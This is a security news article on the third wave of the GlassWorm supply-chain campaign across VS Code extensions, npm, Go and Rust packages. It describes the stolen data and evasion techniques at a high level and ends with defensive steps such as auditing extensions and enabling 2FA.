By ByteBot
The GlassWorm malware campaign returned this week for its third wave, targeting developers across multiple ecosystems with coordinated attacks on VS Code extensions, npm packages, Go modules, and Rust crates. Security researchers discovered 24 malicious extensions on Microsoft and OpenVSX marketplaces on December 2, part of a broader supply chain attack stealing GitHub credentials, npm tokens, cryptocurrency wallets, and complete system access from thousands of developers.
Developer tools themselves have become the primary attack vector. Malicious VS Code extensions grew 4x from 27 in 2024 to 105 in the first 10 months of 2025. One fake extension alone reached 16,000+ installs before detection. When the tools developers trust daily are compromised, every downstream project becomes vulnerable.
Cross-Ecosystem Coordinated Attack
This isn’t just a VS Code problem—attackers simultaneously compromised multiple developer ecosystems. GlassWorm deployed 24 malicious VS Code extensions while threat actors published 420+ malicious npm packages, compromised Go UUID libraries active since 2021, and planted Rust malware loaders, all stealing developer credentials and cryptocurrency.
The Material Icon Theme impersonation with 16,000+ installs contained Rust implants. Meanwhile, 420 npm packages following the “elf-stats-*” naming pattern execute reverse shells. The September 2025 attack compromised chalk and debug packages—collectively downloaded 2.6 billion times weekly—and reached 10% of cloud environments in just 2 hours. Go typosquat packages github.com/bpoorman/uuid and github.com/bpoorman/uid remained active since 2021, just discovered now. The Rust package finch-rust acts as a multi-stage loader executing the sha-rust credential stealer.
Developers cannot simply avoid one package manager or marketplace. The entire supply chain is under attack. Compromising developer machines provides access to repositories, production secrets, and downstream projects, amplifying impact exponentially.
Invisible Unicode and Blockchain C2 Defeat Traditional Defenses
GlassWorm uses advanced evasion techniques that defeat traditional security. Invisible Unicode characters hide malicious code from human review and static analysis. Rust-based native implants prove harder to detect than JavaScript. Most critically, Solana blockchain wallet addresses store command-and-control server details that cannot be shut down by authorities.
Extensions contain native libraries—os.node for Windows, darwin.node for macOS—instead of JavaScript. Implants fetch C2 server details from Solana wallet addresses. Google Calendar events serve as a fallback mechanism, with invisible Unicode hiding backup C2 addresses in event titles. The Rust finch-rust package contains mostly legitimate code with a single malicious line loading the payload. This separation defeats static analysis.
Developers who rely on code review can’t see invisible Unicode. Security tools scanning JavaScript won’t catch Rust implants. Law enforcement can’t seize blockchain C2 infrastructure. Traditional defenses are insufficient.
4x Growth and Massive Scale
The numbers tell a stark story. Malicious VS Code extensions increased 4x in 2025, from 27 in 2024 to 105 in the first 10 months. Individual campaigns show massive reach: the fake Material Icon Theme had 16,000+ installs before removal. The September npm attack reached 10% of cloud environments in just 2 hours. The Beamglea campaign deployed 175 malicious packages with 26,000 combined downloads targeting 135 companies.
The attack surface is exploding. VS Code commands 70%+ developer market share. npm packages see billions of weekly downloads. When attackers compromise tools used by millions of developers daily, a single malicious package propagates through thousands of projects in hours. The September attack proved this—10% penetration in 120 minutes.
Related: IDEsaster: 100% of AI Coding Tools Have Critical Flaws
Total System Compromise
GlassWorm steals far more than code. The malware harvests GitHub, npm, and OpenVSX credentials. It targets 49 different cryptocurrency wallet types. It captures screenshots, clipboard contents, and Wi-Fi passwords. It hijacks browser sessions via headless Chrome and Edge. It deploys hidden VNC servers for complete remote access. It turns developer machines into SOCKS proxy botnets.
As security researcher Idan Dardikman from Koi Security warns: “Your code. Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too.”
This is total system compromise, not just code theft. Stolen GitHub credentials provide access to private repositories and intellectual property. npm tokens allow publishing malicious updates to existing packages. VNC access enables long-term espionage. Once compromised, developers must assume complete exposure and rotate every credential.
How to Protect Yourself
Developers can take immediate action. Audit installed extensions and remove unused ones. Check extension permissions—icon themes shouldn’t need filesystem or network access. Verify publisher identities with blue verified badges. Enable 2FA on GitHub, npm, and OpenVSX accounts. Use the VSCan tool for static extension analysis. Monitor network egress from development machines.
VS Code v1.97+ includes trust dialogs for third-party publishers and signature verification. Microsoft’s Private Marketplace, introduced in November 2025, gives enterprises corporate-controlled extension curation. Microsoft reviewed 136 extensions this year and removed 110—an 81% removal rate—with average 1-business-day response to community reports.
Most protection steps take minutes. Reviewing extensions, checking permissions, and enabling 2FA block most attacks. The Private Marketplace gives enterprises control over what developers can install. Awareness and basic hygiene prevent compromise.
Key Takeaways
- GlassWorm’s third wave demonstrates persistent, evolving threats targeting developer tools across VS Code, npm, Go, and Rust ecosystems simultaneously
- Malicious VS Code extensions increased 4x in 2025 (27 → 105), with one fake extension reaching 16,000+ installs and September npm attack compromising 10% of cloud environments in 2 hours
- Advanced evasion techniques—invisible Unicode, Rust implants, blockchain C2 infrastructure—defeat traditional security defenses including code review and law enforcement takedowns
- Total system compromise includes GitHub/npm credentials, 49 cryptocurrency wallet types, browser sessions, VNC remote access, and botnet recruitment beyond simple code theft
- Immediate protection: audit extensions, verify publishers, check permissions (icon themes shouldn’t need network access), enable 2FA, use VSCan security tool, and adopt Private Marketplace for enterprises
